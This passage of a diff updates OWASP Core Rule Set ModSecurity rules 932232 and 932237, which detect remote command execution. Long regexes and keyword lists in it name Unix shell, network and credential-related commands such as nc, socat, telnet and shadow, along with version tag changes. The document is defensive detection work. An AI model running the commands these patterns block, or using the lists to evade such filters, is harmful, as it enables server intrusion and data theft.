?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))\b" \
     "id:932232,\
     phase:2,\
     block,\
@@ -1570,9 +1637,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1613,7 +1681,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932237
 #
-SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:(?:itude)?[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h?[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\x0b&\)<>\|]|obm)|dd(?:group|user)|getty|nsible)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\x0b&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:(?:out)?[\s\x0b&\)<>\|]|datectl))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|diff)|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:[\s\x0b&\)<>c\|]|h(?:o(?:[\s\x0b&\)<>\|]|ami|is)?|iptail[\s\x0b&\)<>\|])|a(?:ll|tch)[\s\x0b&\)<>\|]|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))(?:\b|[^0-9A-Z_a-z])" \
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)(?:[\s\x0b&\),<>\|]|$)|pt(?:[\s\x0b&\),<>\|]|$|-get|itude(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|t(?:[\s\x0b&\),<>\|]|$|obm(?:[\s\x0b&\),<>\|]|$))|dd(?:group|user)|getty|nsible)|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|idge(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:[\s\x0b&\),<>\|]|$|\+\+)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)(?:[\s\x0b&\),<>\|]|$)|nf(?:[\s\x0b&\),<>\|]|$)?|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:[bd]|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|